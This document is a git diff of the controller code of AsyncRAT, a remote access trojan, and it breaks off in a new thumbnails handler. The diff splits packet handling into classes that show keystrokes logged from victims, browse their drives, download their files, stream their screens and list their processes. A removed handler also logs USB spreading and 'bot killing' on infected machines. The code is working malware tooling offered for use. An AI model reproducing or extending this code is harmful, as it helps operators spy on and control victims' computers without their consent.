diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
index 4dd8991..01640e1 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
@@ -116,8 +116,15 @@
FormDownloadFile.cs
+
+
+
-
+
+
+
+
+
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
index 355dd86..a54d217 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
@@ -76,7 +76,7 @@ namespace AsyncRAT_Sharp
Settings.Port = portsFrm.textPorts.Text;
Settings.Password = portsFrm.textPassword.Text;
Settings.AES = new Aes256(Settings.Password);
-
+ portsFrm.Dispose();
string[] ports = Settings.Port.Split(',');
try
{
@@ -317,6 +317,7 @@ namespace AsyncRAT_Sharp
}
}
formSend.Close();
+ formSend.Dispose();
}
catch (Exception ex)
{
@@ -407,7 +408,9 @@ namespace AsyncRAT_Sharp
private void bUILDERToolStripMenuItem_Click(object sender, EventArgs e)
{
- new FormBuilder().ShowDialog();
+ FormBuilder formBuilder = new FormBuilder();
+ formBuilder.ShowDialog();
+ formBuilder.Dispose();
}
private void fILEMANAGERToolStripMenuItem_Click(object sender, EventArgs e)
@@ -557,7 +560,10 @@ namespace AsyncRAT_Sharp
private void ABOUTToolStripMenuItem_Click(object sender, EventArgs e)
{
- new FormAbout().ShowDialog();
+ using (FormAbout formAbout = new FormAbout())
+ {
+ formAbout.ShowDialog();
+ }
}
private void Form1_Activated(object sender, EventArgs e)
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs
index 7e1849a..b46b8c2 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs
@@ -22,7 +22,7 @@ namespace AsyncRAT_Sharp.Forms
public Form1 F { get; set; }
internal Clients C { get; set; }
public long dSize = 0;
- private void timer1_Tick(object sender, EventArgs e)
+ private async void timer1_Tick(object sender, EventArgs e)
{
labelsize.Text = $"{Methods.BytesToString(dSize)} \\ {Methods.BytesToString(C.BytesRecevied)}";
if (C.BytesRecevied > dSize)
@@ -30,6 +30,9 @@ namespace AsyncRAT_Sharp.Forms
labelsize.Text = "Downloaded";
labelsize.ForeColor = Color.Green;
timer1.Stop();
+ await Task.Delay(1500);
+ this.Close();
+
}
}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/HandleKeylogger.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/HandleKeylogger.cs
new file mode 100644
index 0000000..2b9cc6c
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/HandleKeylogger.cs
@@ -0,0 +1,36 @@
+using AsyncRAT_Sharp.Forms;
+using AsyncRAT_Sharp.MessagePack;
+using AsyncRAT_Sharp.Sockets;
+using System;
+using System.Diagnostics;
+using System.Drawing;
+using System.IO;
+using System.Windows.Forms;
+
+namespace AsyncRAT_Sharp.Forms
+{
+ class HandleKeylogger
+ {
+ public HandleKeylogger(Clients client, MsgPack unpack_msgpack)
+ {
+ if (Program.form1.InvokeRequired)
+ {
+ Program.form1.BeginInvoke((MethodInvoker)(() =>
+ {
+ FormKeylogger KL = (FormKeylogger)Application.OpenForms["keyLogger:" + client.ID];
+ if (KL != null)
+ {
+ KL.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Log").GetAsString());
+ }
+ else
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "keyLogger";
+ msgpack.ForcePathObject("isON").AsString = "false";
+ client.BeginSend(msgpack.Encode2Bytes());
+ }
+ }));
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs
new file mode 100644
index 0000000..21d11e5
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs
@@ -0,0 +1,157 @@
+using AsyncRAT_Sharp.Forms;
+using AsyncRAT_Sharp.MessagePack;
+using AsyncRAT_Sharp.Sockets;
+using System;
+using System.Drawing;
+using System.IO;
+using System.Windows.Forms;
+
+namespace AsyncRAT_Sharp.Handle_Packet
+{
+ public class HandleFileManager
+ {
+ public void FileManager(Clients client, MsgPack unpack_msgpack)
+ {
+ switch (unpack_msgpack.ForcePathObject("Command").AsString)
+ {
+ case "getDrivers":
+ {
+ if (Program.form1.InvokeRequired)
+ {
+ Program.form1.BeginInvoke((MethodInvoker)(() =>
+ {
+ FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
+ if (FM != null)
+ {
+ FM.listView1.Items.Clear();
+ string[] driver = unpack_msgpack.ForcePathObject("Driver").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
+ for (int i = 0; i < driver.Length; i++)
+ {
+ if (driver[i].Length > 0)
+ {
+ ListViewItem lv = new ListViewItem();
+ lv.Text = driver[i];
+ lv.ToolTipText = driver[i];
+ if (driver[i + 1] == "Fixed") lv.ImageIndex = 1;
+ else if (driver[i + 1] == "Removable") lv.ImageIndex = 2;
+ else lv.ImageIndex = 1;
+ FM.listView1.Items.Add(lv);
+ }
+ i += 1;
+ }
+ }
+ }));
+ }
+ break;
+ }
+
+ case "getPath":
+ {
+ if (Program.form1.InvokeRequired)
+ {
+ Program.form1.BeginInvoke((MethodInvoker)(() =>
+ {
+ FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
+ if (FM != null)
+ {
+ FM.listView1.Items.Clear();
+ FM.listView1.Groups.Clear();
+ string[] _folder = unpack_msgpack.ForcePathObject("Folder").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
+ ListViewGroup groupFolder = new ListViewGroup("Folders");
+ FM.listView1.Groups.Add(groupFolder);
+ int numFolders = 0;
+ for (int i = 0; i < _folder.Length; i++)
+ {
+ if (_folder[i].Length > 0)
+ {
+ ListViewItem lv = new ListViewItem();
+ lv.Text = _folder[i];
+ lv.ToolTipText = _folder[i + 1];
+ lv.Group = groupFolder;
+ lv.ImageIndex = 0;
+ FM.listView1.Items.Add(lv);
+ numFolders += 1;
+ }
+ i += 1;
+
+ }
+
+ string[] _file = unpack_msgpack.ForcePathObject("File").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
+ ListViewGroup groupFile = new ListViewGroup("Files");
+ FM.listView1.Groups.Add(groupFile);
+ int numFiles = 0;
+ for (int i = 0; i < _file.Length; i++)
+ {
+ if (_file[i].Length > 0)
+ {
+ ListViewItem lv = new ListViewItem();
+ lv.Text = Path.GetFileName(_file[i]);
+ lv.ToolTipText = _file[i + 1];
+ Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_file[i + 2])));
+ FM.imageList1.Images.Add(_file[i + 1], im);
+ lv.ImageKey = _file[i + 1];
+ lv.Group = groupFile;
+ lv.SubItems.Add(Methods.BytesToString(Convert.ToInt64(_file[i + 3])));
+ FM.listView1.Items.Add(lv);
+ numFiles += 1;
+ }
+ i += 3;
+ }
+ FM.toolStripStatusLabel2.Text = $" Folder[{numFolders.ToString()}] Files[{numFiles.ToString()}]";
+ }
+ }));
+ }
+ break;
+ }
+ }
+ }
+ public void SocketDownload(Clients client, MsgPack unpack_msgpack)
+ {
+ switch (unpack_msgpack.ForcePathObject("Command").AsString)
+ {
+ case "pre":
+ {
+ if (Program.form1.InvokeRequired)
+ {
+ Program.form1.BeginInvoke((MethodInvoker)(() =>
+ {
+
+ string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
+ string file = unpack_msgpack.ForcePathObject("File").AsString;
+ string size = unpack_msgpack.ForcePathObject("Size").AsString;
+ FormDownloadFile SD = (FormDownloadFile)Application.OpenForms["socketDownload:" + dwid];
+ if (SD != null)
+ {
+ SD.C = client;
+ SD.labelfile.Text = Path.GetFileName(file);
+ SD.dSize = Convert.ToInt64(size);
+ SD.timer1.Start();
+ }
+ }));
+ }
+ break;
+ }
+
+ case "save":
+ {
+ if (Program.form1.InvokeRequired)
+ {
+ Program.form1.BeginInvoke((MethodInvoker)(() =>
+ {
+ string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
+ FormDownloadFile SD = (FormDownloadFile)Application.OpenForms["socketDownload:" + dwid];
+ if (SD != null)
+ {
+ if (!Directory.Exists(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", ""))))
+ Directory.CreateDirectory(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", "")));
+
+ unpack_msgpack.ForcePathObject("File").SaveBytesToFile(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", "") + "\\" + unpack_msgpack.ForcePathObject("Name").AsString));
+ }
+ }));
+ }
+ break;
+ }
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs
new file mode 100644
index 0000000..72bc822
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs
@@ -0,0 +1,51 @@
+using AsyncRAT_Sharp.MessagePack;
+using AsyncRAT_Sharp.Sockets;
+using cGeoIp;
+using System.Drawing;
+using System.Windows.Forms;
+
+namespace AsyncRAT_Sharp.Handle_Packet
+{
+ public class HandleListView
+ {
+ public void AddToListview(Clients client, MsgPack unpack_msgpack)
+ {
+ if (Program.form1.listView1.InvokeRequired)
+ {
+ Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
+ {
+ client.LV = new ListViewItem();
+ client.LV.Tag = client;
+ client.LV.Text = string.Format("{0}:{1}", client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]);
+ string[] ipinf = new cGeoMain().GetIpInf(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]).Split(':');
+ client.LV.SubItems.Add(ipinf[1]);
+ client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("HWID").AsString);
+ client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("User").AsString);
+ client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString);
+ client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString);
+ client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString);
+ client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString;
+ client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
+ Program.form1.listView1.Items.Insert(0, client.LV);
+ Program.form1.listView1.AutoResizeColumns(ColumnHeaderAutoResizeStyle.HeaderSize);
+ }));
+ lock (Settings.Online)
+ {
+ Settings.Online.Add(client);
+ }
+ new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} connected successfully", Color.Green);
+ }
+ }
+
+ public void Received(Clients client)
+ {
+ if (Program.form1.listView1.InvokeRequired)
+ {
+ Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
+ {
+ client.LV.ForeColor = Color.Empty;
+ }));
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleLogs.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleLogs.cs
index db85655..c540635 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleLogs.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleLogs.cs
@@ -8,9 +8,9 @@ using System.Drawing;
namespace AsyncRAT_Sharp.Handle_Packet
{
- static class HandleLogs
+ public class HandleLogs
{
- public static void Addmsg(string Msg, Color color)
+ public void Addmsg(string Msg, Color color)
{
if (Program.form1.listView2.InvokeRequired)
{
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs
deleted file mode 100644
index 2cdd29f..0000000
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs
+++ /dev/null
@@ -1,396 +0,0 @@
-using AsyncRAT_Sharp.Sockets;
-using System.Windows.Forms;
-using AsyncRAT_Sharp.MessagePack;
-using System;
-using System.Diagnostics;
-using System.Drawing;
-using AsyncRAT_Sharp.Forms;
-using System.IO;
-using cGeoIp;
-
-namespace AsyncRAT_Sharp.Handle_Packet
-{
- class HandlePacket
- {
- private static readonly cGeoMain cNewGeoUse = new cGeoMain();
- public static void Read(object Obj)
- {
- try
- {
- object[] array = Obj as object[];
- byte[] data = (byte[])array[0];
- Clients client = (Clients)array[1];
- MsgPack unpack_msgpack = new MsgPack();
- unpack_msgpack.DecodeFromBytes(data);
- switch (unpack_msgpack.ForcePathObject("Packet").AsString)
- {
- case "ClientInfo":
- if (Program.form1.listView1.InvokeRequired)
- {
- Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
- {
- client.LV = new ListViewItem();
- client.LV.Tag = client;
- client.LV.Text = string.Format("{0}:{1}", client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]);
- string[] ipinf = cNewGeoUse.GetIpInf(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]).Split(':');
- client.LV.SubItems.Add(ipinf[1]);
- client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("HWID").AsString);
- client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("User").AsString);
- client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString);
- client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString);
- client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString);
- client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString;
- client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
- Program.form1.listView1.BeginUpdate();
- Program.form1.listView1.Items.Insert(0, client.LV);
- Program.form1.listView1.AutoResizeColumns(ColumnHeaderAutoResizeStyle.HeaderSize);
- Program.form1.listView1.EndUpdate();
- }));
- lock (Settings.Online)
- {
- Settings.Online.Add(client);
- }
- HandleLogs.Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} connected successfully", Color.Green);
- }
- break;
-
- case "Ping":
- {
- if (Program.form1.listView1.InvokeRequired)
- {
- Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
- {
- if (client.LV != null)
- {
- client.LV.SubItems[Program.form1.lv_prefor.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
- }
- }));
- }
- }
- break;
-
- case "Logs":
- {
- HandleLogs.Addmsg(unpack_msgpack.ForcePathObject("Message").AsString, Color.Black);
- }
- break;
-
- case "thumbnails":
- {
- if (Program.form1.listView3.InvokeRequired)
- {
- Program.form1.listView3.BeginInvoke((MethodInvoker)(() =>
- {
- if (client.LV2 == null)
- {
- client.LV2 = new ListViewItem();
- client.LV2.Text = string.Format("{0}:{1}", client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]);
- client.LV2.ToolTipText = client.ID;
- using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
- {
- Program.form1.imageList1.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
- client.LV2.ImageKey = client.ID;
- Program.form1.listView3.BeginUpdate();
- Program.form1.listView3.Items.Insert(0,client.LV2);
- Program.form1.listView3.EndUpdate();
- }
- }
- else
- {
- using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
- {
- Program.form1.listView3.BeginUpdate();
- Program.form1.imageList1.Images.RemoveByKey(client.ID);
- Program.form1.imageList1.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
- Program.form1.listView3.EndUpdate();
- }
- }
- }));
- }
- }
- break;
-
- case "BotKiller":
- {
- HandleLogs.Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} malwares and killed them successfully", Color.Orange);
- }
- break;
-
-
- case "usbSpread":
- {
- HandleLogs.Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} USB drivers and spreaded them successfully", Color.Purple);
- }
- break;
-
- case "Received":
- {
- if (Program.form1.listView1.InvokeRequired)
- {
- Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
- {
- client.LV.ForeColor = Color.Empty;
- }));
- }
- }
- break;
-
- case "remoteDesktop":
- {
- if (Program.form1.InvokeRequired)
- {
- Program.form1.BeginInvoke((MethodInvoker)(() =>
- {
- FormRemoteDesktop RD = (FormRemoteDesktop)Application.OpenForms["RemoteDesktop:" + unpack_msgpack.ForcePathObject("ID").AsString];
- try
- {
- if (RD != null)
- {
- if (RD.C2 == null)
- {
- RD.C2 = client;
- RD.timer1.Start();
- }
- byte[] RdpStream = unpack_msgpack.ForcePathObject("Stream").GetAsBytes();
- Bitmap decoded = RD.decoder.DecodeData(new MemoryStream(RdpStream));
-
- if (RD.RenderSW.ElapsedMilliseconds >= (1000 / 20))
- {
- RD.pictureBox1.Image = (Bitmap)decoded;
- RD.RenderSW = Stopwatch.StartNew();
- }
- RD.FPS++;
- if (RD.sw.ElapsedMilliseconds >= 1000)
- {
- RD.Text = "RemoteDesktop:" + client.ID + " FPS:" + RD.FPS + " Screen:" + decoded.Width + " x " + decoded.Height + " Size:" + Methods.BytesToString(RdpStream.Length);
- RD.FPS = 0;
- RD.sw = Stopwatch.StartNew();
- }
- }
- else
- {
- client.Disconnected();
- return;
- }
- }
- catch (Exception ex) { Debug.WriteLine(ex.Message); }
- }));
- }
- }
- break;
-
- case "processManager":
- {
- if (Program.form1.InvokeRequired)
- {
- Program.form1.BeginInvoke((MethodInvoker)(() =>
- {
- FormProcessManager PM = (FormProcessManager)Application.OpenForms["processManager:" + client.ID];
- if (PM != null)
- {
- PM.listView1.Items.Clear();
- string msgUnpack = unpack_msgpack.ForcePathObject("Message").AsString;
- string processLists = msgUnpack.ToString();
- string[] _NextProc = processLists.Split(new[] { "-=>" }, StringSplitOptions.None);
- for (int i = 0; i < _NextProc.Length; i++)
- {
- if (_NextProc[i].Length > 0)
- {
- ListViewItem lv = new ListViewItem();
- lv.Text = Path.GetFileName(_NextProc[i]);
- lv.SubItems.Add(_NextProc[i + 1]);
- lv.ToolTipText = _NextProc[i];
- Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_NextProc[i + 2])));
- PM.imageList1.Images.Add(_NextProc[i + 1], im);
- lv.ImageKey = _NextProc[i + 1];
- PM.listView1.Items.Add(lv);
- }
- i += 2;
- }
- }
- }));
- }
- }
- break;
-
-
- case "socketDownload":
- {
- switch (unpack_msgpack.ForcePathObject("Command").AsString)
- {
- case "pre":
- {
- if (Program.form1.InvokeRequired)
- {
- Program.form1.BeginInvoke((MethodInvoker)(() =>
- {
-
- string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
- string file = unpack_msgpack.ForcePathObject("File").AsString;
- string size = unpack_msgpack.ForcePathObject("Size").AsString;
- FormDownloadFile SD = (FormDownloadFile)Application.OpenForms["socketDownload:" + dwid];
- if (SD != null)
- {
- SD.C = client;
- SD.labelfile.Text = Path.GetFileName(file);
- SD.dSize = Convert.ToInt64(size);
- SD.timer1.Start();
- }
- }));
- }
- }
- break;
-
- case "save":
- {
- if (Program.form1.InvokeRequired)
- {
- Program.form1.BeginInvoke((MethodInvoker)(() =>
- {
- string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
- FormDownloadFile SD = (FormDownloadFile)Application.OpenForms["socketDownload:" + dwid];
- if (SD != null)
- {
- if (!Directory.Exists(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", ""))))
- Directory.CreateDirectory(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", "")));
-
- unpack_msgpack.ForcePathObject("File").SaveBytesToFile(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", "") + "\\" + unpack_msgpack.ForcePathObject("Name").AsString));
- }
- }));
- }
- }
- break;
- }
- break;
- }
-
- case "keyLogger":
- {
- if (Program.form1.InvokeRequired)
- {
- Program.form1.BeginInvoke((MethodInvoker)(() =>
- {
- FormKeylogger KL = (FormKeylogger)Application.OpenForms["keyLogger:" + client.ID];
- if (KL != null)
- {
- KL.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Log").GetAsString());
- }
- else
- {
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "keyLogger";
- msgpack.ForcePathObject("isON").AsString = "false";
- client.BeginSend(msgpack.Encode2Bytes());
- }
- }));
- }
- break;
- }
-
- case "fileManager":
- {
- switch (unpack_msgpack.ForcePathObject("Command").AsString)
- {
- case "getDrivers":
- {
- if (Program.form1.InvokeRequired)
- {
- Program.form1.BeginInvoke((MethodInvoker)(() =>
- {
- FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
- if (FM != null)
- {
- FM.listView1.Items.Clear();
- string[] driver = unpack_msgpack.ForcePathObject("Driver").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
- for (int i = 0; i < driver.Length; i++)
- {
- if (driver[i].Length > 0)
- {
- ListViewItem lv = new ListViewItem();
- lv.Text = driver[i];
- lv.ToolTipText = driver[i];
- if (driver[i + 1] == "Fixed") lv.ImageIndex = 1;
- else if (driver[i + 1] == "Removable") lv.ImageIndex = 2;
- else lv.ImageIndex = 1;
- FM.listView1.Items.Add(lv);
- }
- i += 1;
- }
- }
- }));
- }
- }
- break;
-
- case "getPath":
- {
- if (Program.form1.InvokeRequired)
- {
- Program.form1.BeginInvoke((MethodInvoker)(() =>
- {
- FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
- if (FM != null)
- {
- FM.listView1.Items.Clear();
- FM.listView1.Groups.Clear();
- string[] _folder = unpack_msgpack.ForcePathObject("Folder").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
- ListViewGroup groupFolder = new ListViewGroup("Folders");
- FM.listView1.Groups.Add(groupFolder);
- int numFolders = 0;
- for (int i = 0; i < _folder.Length; i++)
- {
- if (_folder[i].Length > 0)
- {
- ListViewItem lv = new ListViewItem();
- lv.Text = _folder[i];
- lv.ToolTipText = _folder[i + 1];
- lv.Group = groupFolder;
- lv.ImageIndex = 0;
- FM.listView1.Items.Add(lv);
- numFolders += 1;
- }
- i += 1;
-
- }
-
- string[] _file = unpack_msgpack.ForcePathObject("File").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
- ListViewGroup groupFile = new ListViewGroup("Files");
- FM.listView1.Groups.Add(groupFile);
- int numFiles = 0;
- for (int i = 0; i < _file.Length; i++)
- {
- if (_file[i].Length > 0)
- {
- ListViewItem lv = new ListViewItem();
- lv.Text = Path.GetFileName(_file[i]);
- lv.ToolTipText = _file[i + 1];
- Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_file[i + 2])));
- FM.imageList1.Images.Add(_file[i + 1], im);
- lv.ImageKey = _file[i + 1];
- lv.Group = groupFile;
- lv.SubItems.Add(Methods.BytesToString(Convert.ToInt64(_file[i + 3])));
- FM.listView1.Items.Add(lv);
- numFiles += 1;
- }
- i += 3;
- }
- FM.toolStripStatusLabel2.Text = $" Folder[{numFolders.ToString()}] Files[{numFiles.ToString()}]";
- }
- }));
- }
- }
- break;
- }
- break;
- }
- }
- }
- catch (Exception ex)
- {
- Debug.WriteLine(ex.Message);
- }
- //GC.Collect();
- //GC.WaitForPendingFinalizers();
- }
- }
-}
\ No newline at end of file
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePing.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePing.cs
new file mode 100644
index 0000000..1908554
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePing.cs
@@ -0,0 +1,23 @@
+using AsyncRAT_Sharp.MessagePack;
+using AsyncRAT_Sharp.Sockets;
+using System.Windows.Forms;
+
+namespace AsyncRAT_Sharp.Handle_Packet
+{
+ public class HandlePing
+ {
+ public HandlePing(Clients client, MsgPack unpack_msgpack)
+ {
+ if (Program.form1.listView1.InvokeRequired)
+ {
+ Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
+ {
+ if (client.LV != null)
+ {
+ client.LV.SubItems[Program.form1.lv_prefor.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
+ }
+ }));
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleProcessManager.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleProcessManager.cs
new file mode 100644
index 0000000..cf70661
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleProcessManager.cs
@@ -0,0 +1,45 @@
+using AsyncRAT_Sharp.Forms;
+using AsyncRAT_Sharp.MessagePack;
+using AsyncRAT_Sharp.Sockets;
+using System;
+using System.Drawing;
+using System.IO;
+using System.Windows.Forms;
+
+namespace AsyncRAT_Sharp.Handle_Packet
+{
+ public class HandleProcessManager
+ {
+ public void GetProcess(Clients client, MsgPack unpack_msgpack)
+ {
+ if (Program.form1.InvokeRequired)
+ {
+ Program.form1.BeginInvoke((MethodInvoker)(() =>
+ {
+ FormProcessManager PM = (FormProcessManager)Application.OpenForms["processManager:" + client.ID];
+ if (PM != null)
+ {
+ PM.listView1.Items.Clear();
+ string processLists = unpack_msgpack.ForcePathObject("Message").AsString;
+ string[] _NextProc = processLists.Split(new[] { "-=>" }, StringSplitOptions.None);
+ for (int i = 0; i < _NextProc.Length; i++)
+ {
+ if (_NextProc[i].Length > 0)
+ {
+ ListViewItem lv = new ListViewItem();
+ lv.Text = Path.GetFileName(_NextProc[i]);
+ lv.SubItems.Add(_NextProc[i + 1]);
+ lv.ToolTipText = _NextProc[i];
+ Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_NextProc[i + 2])));
+ PM.imageList1.Images.Add(_NextProc[i + 1], im);
+ lv.ImageKey = _NextProc[i + 1];
+ PM.listView1.Items.Add(lv);
+ }
+ i += 2;
+ }
+ }
+ }));
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs
new file mode 100644
index 0000000..e426fbb
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs
@@ -0,0 +1,57 @@
+using AsyncRAT_Sharp.Forms;
+using AsyncRAT_Sharp.MessagePack;
+using AsyncRAT_Sharp.Sockets;
+using System;
+using System.Diagnostics;
+using System.Drawing;
+using System.IO;
+using System.Windows.Forms;
+
+namespace AsyncRAT_Sharp.Handle_Packet
+{
+ public class HandleRemoteDesktop
+ {
+ public void Capture(Clients client, MsgPack unpack_msgpack)
+ {
+ if (Program.form1.InvokeRequired)
+ {
+ Program.form1.BeginInvoke((MethodInvoker)(() =>
+ {
+ FormRemoteDesktop RD = (FormRemoteDesktop)Application.OpenForms["RemoteDesktop:" + unpack_msgpack.ForcePathObject("ID").AsString];
+ try
+ {
+ if (RD != null)
+ {
+ if (RD.C2 == null)
+ {
+ RD.C2 = client;
+ RD.timer1.Start();
+ }
+ byte[] RdpStream = unpack_msgpack.ForcePathObject("Stream").GetAsBytes();
+ Bitmap decoded = RD.decoder.DecodeData(new MemoryStream(RdpStream));
+
+ if (RD.RenderSW.ElapsedMilliseconds >= (1000 / 20))
+ {
+ RD.pictureBox1.Image = (Bitmap)decoded;
+ RD.RenderSW = Stopwatch.StartNew();
+ }
+ RD.FPS++;
+ if (RD.sw.ElapsedMilliseconds >= 1000)
+ {
+ RD.Text = "RemoteDesktop:" + client.ID + " FPS:" + RD.FPS + " Screen:" + decoded.Width + " x " + decoded.Height + " Size:" + Methods.BytesToString(RdpStream.Length);
+ RD.FPS = 0;
+ RD.sw = Stopwatch.StartNew();
+ }
+ }
+ else
+ {
+ client.Disconnected();
+ return;
+ }
+ }
+ catch (Exception ex) { Debug.WriteLine(ex.Message); }
+ }));
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleThumbnails.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleThumbnails.cs
new file mode 100644
index 0000000..540bc5e
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleThumbnails.cs
@@ -0,0 +1,45 @@
+using AsyncRAT_Sharp.MessagePack;
+using AsyncRAT_Sharp.Sockets;
+using System.Drawing;
+using System.IO;
+using System.Windows.Forms;
+
+namespace AsyncRAT_Sharp.Handle_Packet
+{
+ public class HandleThumbnails
+ {
+ public HandleThumbnails(Clients client, MsgPack unpack_msgpack)
